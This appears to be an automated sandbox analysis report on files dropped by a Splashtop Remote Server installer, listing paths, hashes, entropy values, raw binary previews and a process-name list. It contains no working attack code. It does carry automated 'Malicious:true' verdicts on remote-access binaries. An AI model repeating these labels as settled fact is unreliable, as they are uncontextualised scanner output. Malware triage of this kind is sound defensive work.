                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(..nl.s=l.s=l.s=..p<f.s=..v<..s=j%w<x.s=j%p<y.s=j%v<\.s=..w<z.s=..r<w.s=l.r=..s=.%z<g.s=.%.=m.s=l..=m.s=.%q<m.s=Richl.s=........................PE..L......f...............&.F...........=.......`....@.................................a0....@.....................................P........[...........F...(...`..........p...........................P...@............`...............................text....D.......F.................. ..`.rdata...}...`...~...J..............@..@.data...............................@....rsrc....[.......\..................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdate.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2790408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.514577221057585
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:WSr4ZoENE5MyhngQnMb4weF5g7IqoiG+dwoCbdAy1kHW1SQeBFm:Z4Zox5MyRgOMbCzg7IqoiGcwoCbyySWX
                                                                                                                                                                                                                                                                                                                                  MD5:D5581A901350375FFE261DDF18F347E3
                                                                                                                                                                                                                                                                                                                                  SHA1:EE4F16A0F361A7F099DDBC51586CBDD3EC255D39
                                                                                                                                                                                                                                                                                                                                  SHA-256:99D66B5B42A8E410E536837A12A2D8F457CE61FB1A1C69B05FF2C5376314DE64
                                                                                                                                                                                                                                                                                                                                  SHA-512:C65AEE735747BA2453AD21F9FD1D29A90A82C0F4B587DDF6E484001F6917A4E0B59FF16B5B45C73252352F208C9E1E3C83474001E7F971B87513C580B59FC1D1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........t...........&g.....mo....&g....&g.'..&g....&g.......H.............................|.........Rich...........................PE..L......f...............&.B...n......X........`....@...........................*......$+...@................................. " ...... !..W...........l*..(....(.|c...G..p...................@H.......F..@............`...............................text...)A.......B.................. ..`.rdata.......`.......F..............@..@.data...t....p ..f...J .............@....rsrc....W... !..X.... .............@..@.reloc..|c....(..d....(.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUpdateInstall.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):170504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5841601575712705
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:pbZwVL8XodHGBy7R9ayIrkTGmqg7lEahOAPCCI184h9kCesIL:oYXRsR2YTGmrRhJE8s4
                                                                                                                                                                                                                                                                                                                                  MD5:13E355A119AAAAC41972317CA9457DFC
                                                                                                                                                                                                                                                                                                                                  SHA1:EE9643435BF6B3F7E2EBF0234624B328B25D31D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:804E12CB733A93B9D7FCBF1185F5A7EA98345A2787322534FEBE29519F0DB00D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC979B409188CAD7F323EC31E2A955A6326FC6A58F959B669B8DCF751BB5729326F4110ACDF29176CF1F279173073EC46D41D766F4CD35EB7298097030DE2B92
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u...................sv..a...sv..`...sv..E.......c.......b...u........v.......va.t...u...t....v..t...Richu...........PE..L......f...............&.............C............@.......................................@..................................Q..P....................r...(......@... ;..p....................;......`:..@............................................text.............................. ..`.rdata..F...........................@..@.data...4....`.......F..............@....rsrc................T..............@..@.reloc..@............Z..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):203272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.606529957213957
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:YA7EiJa+hGYsOhSCixWVg0jbhm4y8RP7Z+0He9ltPVhVsjigecYQL0S6G07ds8iD:YA7EiJncMhlNA4Phd+0HuFZFQYp7dskM
                                                                                                                                                                                                                                                                                                                                  MD5:257ACE30C4ED3C4F8E1F2E3BBF3638A2
                                                                                                                                                                                                                                                                                                                                  SHA1:66341EC880971724368456E4278E69F4D7F3488E
                                                                                                                                                                                                                                                                                                                                  SHA-256:7989888FC3AA7447BCF51615BD7CDC2E66E01E873A399D5947527156DD7B2595
                                                                                                                                                                                                                                                                                                                                  SHA-512:BE707D9840E8846D7B709BF6B6A3B10DAAA0B3D3AC70ACE9E7802A90CBBF76F3F17528452B8569E4E514CBFCF626F72916B1AF8DC23A4E1DCABD06C6A0B62E5C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SZ..;...;...;...I...;.......;.......;...... ;...I...;...I..;...I...;...;..!:..y....;..y.{..;...;...;..y....;..Rich.;..........................PE..L......f...............&............&........ ....@..........................0......@.....@.................................D...........X................(..............p..............................@............ ...............................text...0........................... ..`.rdata.. .... ......................@..@.data...x...........................@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):333320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.909775605022876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:2lc/Jz+v9TViX69NAqxVKhFcuUa/w28bgSl1FcXirkmMDt:wcU9oe61hFPqgSzrkmMDt
                                                                                                                                                                                                                                                                                                                                  MD5:562D29B934BFB893AF36F03CBA478AE3
                                                                                                                                                                                                                                                                                                                                  SHA1:5AA2D1A95EE82DADB2EE604E503CEAF3FBFDDD6F
                                                                                                                                                                                                                                                                                                                                  SHA-256:ADEDDB37D54E44F84BE0F3824A5C2E98EDF831D6E16836C4CDF34FC47DA4BBF3
                                                                                                                                                                                                                                                                                                                                  SHA-512:0E85A3BC34D44815442DAAECF910AE02216B28891D785C2C85072FB2824E0AC4056A658C76522C4659F5275F975F291C8BC9217856F52EF1DB6778069FCF8A20
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......5...q...q...q.....c...........f...V...c...q...K...t..`......{.....p...wR..p...wR..c...wR..i...wR..$.....f...q...d....R..E....R..p....R..p...q.u.p....R..p...Richq...........................PE..L....d.f...........!...&..................................................................@.............................T.......@........................(.. ...............................................................\1......................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrlEx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):337416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.910033827099534
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jlsrxoLbx49G3x2MB7oUR71gg/wl12GSHU2eQHx+0lnPmDfYfG:B0dwUQNTW12GoU2eQR+SPmbkG
                                                                                                                                                                                                                                                                                                                                  MD5:7A90EC5109E67E431CAF2FD55D41F82F
                                                                                                                                                                                                                                                                                                                                  SHA1:412F6A3E795502CD39F76FD51B138E06A081F146
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FA77B33CCCE1B5412A9866ACB63B050F6F94485EF8AEC378BC82D02929A1001
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACDBE23B0FA784EA5433A223AEA32CF1C86436F7C9F4E715A10B6A891B4D6B8CEAA943C26444B5813AFDB6C9C4DE6F43B81A632D74920373C0D802613DFD2ED0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........e.g...4...4...4.v.5...4.v.5m..4.v.5...4..4...4...4...4...4...4OZ.5...4.v.5...4..4...4..5...4..5...4..5...4.v.5...4...4...4...5...4...5...4..,4...4..D4...4...5...4Rich...4........PE..L....d.f...........!...&......... ..`....0... ...............................0.......7....@..........................(..X....&..@.... ...................(..$)..............................\.......|........................e......................UPX0..... ..............................UPX1.........0......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVirtualDisplay.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2583048
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.442044278446494
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:o1esQWMRpVmV8pBn1z8BwFpei8OptK0t67vWL4fJnuU4e0M:Gj2pE8pHgaFp78OptK0t67vWL8JnuU3
                                                                                                                                                                                                                                                                                                                                  MD5:FA5E36C3E5FC0280416927A1A215D6E8
                                                                                                                                                                                                                                                                                                                                  SHA1:4499057334E5A75BDF65F02D049CC46D1654CC85
                                                                                                                                                                                                                                                                                                                                  SHA-256:2C2366CE0A743B711C5752C26577E6BA0431B8BFE985E18D9ED09F20BDD6680E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4BD887D92D0A0119959C01E0745E248E6A01DEEDEE4667CFD30D08789FA79B99E84CDF9ED6FD71AC2B779A2D9B4ABA04148A298CF6BEB38A8314AE260E8ABAB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`...`...`.......`.......`.......`.......`.......`...`..nc.......`.......`......Ga......`......`...`q..`......`..Rich.`..........PE..L......f...............&..........................@...........................'.......'...@.................................|Z!......p"..............B'..(...p%.,W...x..p....................y...... x..@...............4............................text...L........................... ..`.rdata..............................@..@.data.........!..j....!.............@....rsrc........p".......!.............@..@.reloc..,W...p%..X....$.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264Wrapper.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):300552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.694884074448344
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:58NDLS11sBLMbcyhC4KlW+G2Qnyu1C9wYM3I0W52h:CDLG1sBQbcyhCu1C9wY0W52h
                                                                                                                                                                                                                                                                                                                                  MD5:5736A2E092792B1822E1D8F4C92B50BA
                                                                                                                                                                                                                                                                                                                                  SHA1:655D7CA8B3B8649FF25E4D4F4BAD3C1E9F8E18C3
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F117D689FFF0C0BAA3AE6855DEF05AF630148FA30B97CB47833316BD69599D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:6B6123F242E463CE144B3D2966F7C2F072346BE01EDA82C188CD560172BE0DC6FD533C79305532BA01825DFF3C1663667F9C1A673540E71D73B73BBDE766534D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H....._.._.._..^.._..^.._..^.._.J.^.._.J.^.._.J.^.._.._.._..^.._.._]._bJ.^.._bJ.^.._bJP_.._..8_.._bJ.^.._Rich.._................PE..L......f...........!...&............h...............................................v[....@..........................:..$....;..<....p..x............n...(.......!...(..p............................(..@...............h............................text............................... ..`.rdata..X...........................@..@.data.... ...P.......:..............@....rsrc...x....p.......F..............@..@.reloc...!......."...L..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperEx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):115208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.877996118531337
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Ojw9KC9FNiaL9tfuTjyUDJ90sFAmUPDo0hbn+F2LyvwFOs/cYb:b9KC9FNbwl9+D7o+XmIFOh4
                                                                                                                                                                                                                                                                                                                                  MD5:6B82A354476FA7C56175EE060F08E2C9
                                                                                                                                                                                                                                                                                                                                  SHA1:D77566D72C6F1C796C2E8087A9BD04920455B138
                                                                                                                                                                                                                                                                                                                                  SHA-256:754C8D6C7C91B7620A7EE34665C28F0BE67686591E5B49A7E9B8C33BAEF6C37E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E5241DCF50B4D6003FCF1FE14F8693CDE525CDF020E7CF7557B76AC954102722C7721BDE48DAE08A4524A12E611AF950588ADBEEBC95158901BCA6238CE2FA51
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5S..5S..5SDn.S..5SDn.S..5SDn.S..5S..0R..5S..1R..5S..6R..5S..5S..5S...S..5S..4S..5SY.<R..5SY.5R..5SY..S..5S..S..5SY.7R..5SRich..5S................PE..L...w..e...........!................P*.......0...............................@......:g....@.........................<6..(....5.......0...................(..d7.......................................,..............................................UPX0....................................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperExx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):733704
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.921389042280339
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SEjmVTsQGgZp4zjWURE9b9Sh73+axBJIsPqTVzVpW6jg6sQNGh+rIY2eV0Vt3Cz8:SEjmpsdgZwjWUREN9o91kV5pWmNGhM/q
                                                                                                                                                                                                                                                                                                                                  MD5:C0B530DCB39BFFA1B2A64DCB9DCE67CC
                                                                                                                                                                                                                                                                                                                                  SHA1:FC80610E9876B750B5C71CDBA679610320C3DF49
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4103499C3584F3D2274E8D81B1355312D7CCF2CA794C746915ADA79C12F0D7D
                                                                                                                                                                                                                                                                                                                                  SHA-512:1326AD4B4EE3920E21449A0367E5912605AEAAF5C692A9042FEEBD2E4B789408DE605A7154D2DCD8A038358A98457312403C7AD550B3CDA64ED9D3E81E23459C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........u...........A.&....A.$.V..A.%....k.......|.....|.....|..........Oa.....lD..........\}....\}....\}(......@....\}....Rich...................PE..L...w..e...........!..............(..3...(...3...............................3.....b.....@...........................3.d.....3.x.....3..................(..x.3.......................................3.............................................UPX0......(.............................UPX1..........(.....................@....rsrc.........3.....................@......................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\STRLOG\splashtop.bl

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3835
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.764498295481361
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:y7IqsbCST8eInWhT2YB9tds0xNqu72V3VcaM/g7QSEvqcAzOt6zS:y7IuxeeS9VjiMl6e
                                                                                                                                                                                                                                                                                                                                  MD5:D949C968DFD291B7D69CD9A65A1CBC8A
                                                                                                                                                                                                                                                                                                                                  SHA1:9FD25344A4E35BE5F6FCC3CBD346D9230820016F
                                                                                                                                                                                                                                                                                                                                  SHA-256:D166064C6FFADBD505076B633E10D5536739C3E68E4B48F6A396FD8299666E56
                                                                                                                                                                                                                                                                                                                                  SHA-512:68C26A66AEE424CFEAF9A5BADFA2592DA91C5B1BE65B69C60879255936413215BDA05D5633F69C7AAD2688A53A586BB54E3AC722E2DCE3BFAC034C4C1C4594B4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.svchost.exe..csrss.exe..SearchFilterHost.exe..SearchProtocolHost.exe..conhost.exe..winlogon.exe..SRServer.exe..SRService.exe..lsass.exe..services.exe..smss.exe..wininit.exe..lsm.exe..SSUService.exe..spoolsv.exe..SRFeature.exe..SearchIndexer.exe..WmiPrvSE.exe..mDNSResponder.exe..AppleMobileDeviceService.exe..nvvsvc.exe..DataProxy.exe..iPodService.exe..audiodg.exe..cmd.exe..spupnp.exe..WLIDSVC.EXE..WLIDSVCM.EXE..dllhost.exe..taskeng.exe..armsvc.exe..rundll32.exe..atieclxx.exe..atiesrxx.exe..ctfmon.exe..SeaPort.exe..nvxdsync.exe..MsMpEng.exe..nvSCPAPISvr.exe..wlanext.exe..LMS.exe..ccsvchst.exe..UNS.exe..mscorsvw.exe..msiexec.exe..iTunesHelper.exe..LSSrvc.exe..btwdins.exe..LogonUI.exe..TrustedInstaller.exe..avgwdsvc.exe..jusched.exe..unsecapp.exe..IAStorDataMgrSvc.exe..PnkBstrA.exe..AVGIDSAgent.exe..GoogleUpdate.exe..AvastSvc.exe..RTHDCPL.exe..sqlwriter.exe..IAANTmon.exe..avgcsrva.exe..mdm.exe..igfxsrvc.exe..Ati2evxx.exe..ZhuDongFangYu.exe..VSSVC.exe..wisptis.exe..hpqWmiEx.exe..avgcsrvx

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x64\SRCredentialProvider.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..............].......j.......j.......j...............j.......j.......j...............j......Rich....................PE..d......e.........." ................<........................................@............@..........................................p..w....^....... ...........6.......(...0...... ...................................................(............................text...>~.......................... ..`.rdata..G...........................@..@.data....[.......&...f..............@....pdata...6.......8..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x86\SRCredentialProvider.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):263688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578168733069161
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:rP7UBxcJ1Puvfk+GTVGUtO9EU5dem+b0sInsLwcQRelNXkd6X0ThhYibRYI:DhmE+YQY4/eHw5ew8N0A2Xbh
                                                                                                                                                                                                                                                                                                                                  MD5:F276DD195D935138FA1EDA9C522CD62C
                                                                                                                                                                                                                                                                                                                                  SHA1:67508C991FAE8F6A503B7997D96CE4BB7AF559CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:3E4FF68E9E2E312A9DDCD249F9BC2782103452E64CF6DF2914EF989006DD6EFA
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3E2C301A7091D04F0D17BCDDC2BB0057366FE7089564966FE2EFD56ABD381190B01672DB6E6C7330E553382D38D7FEFDB644F1DF9F28B85714F52F695D812AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l.._(..(..(..../.)..!.,.2..!.:....!.*.3..(..!..!.=.t..!.+.)..!.-.)..(...)..!.(.)..Rich(..................PE..L...%..e...........!................+........................................@............@.............................w....~...........................(......X$...................................O..@............................................text............................... ..`.rdata..W~..........................@..@.data....K...........z..............@....rsrc...............................@..@.reloc...@.......B..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_provider.man

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.463053305093135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:NZ9Y9R9iY+Al8/ky6V9R9iYsrAl8/k5v+sv:0bMAl8j6vbirAl8mv+y
                                                                                                                                                                                                                                                                                                                                  MD5:20D8473FB148C4ADA5878B313BC776AF
                                                                                                                                                                                                                                                                                                                                  SHA1:1C88D93AED07AF5753D5CADE1BBA2EC1A69C81A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:FAFFFA0C014BF46A71E323FC4275A5A9004FF90B474B1B7A30D5728FA81D3568
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6AD6B5F040C927685FB4BF4A83149DCDDB22F8A1BD5ECFF5B6E69ECAB80FA7DDAACFA4FA7EB35D9723F4CF364B96D61482FA805F5B6595AEDF064C3C099C2B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t..... . . . .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s."..... . . . .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s."..... . . . .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.".>..... . .<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>..... . . . .<.e.v.e.n.t.s.>......... . . . . . .<.p.r.o.v.i.d.e.r..... . . . . . . . . . .s.y.m.b.o.l.=.".P.r.o.v.i.d.e.r._.S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r._.S.t.a.t.u.s."..... . . . . . . . . . .n.a.m.e.=.".S.p.l.a.s.h.t.o.p.-.S.p.l.a.s.h.t.o.p. .S.t.r.e.a.m.e.r.-.S.t.a.t.u.s."..... . . . . . . . . . .m.e.s.s.a.g.e.=.".$.(.s.t.r.i.n.g...P.r.o.v.i.d.e.r...S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r._.S.t.a.t.u.s.)."..... . . . . . . . . . .g.u.i.d.=.".{.6.6.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x64.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7217591844595956
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
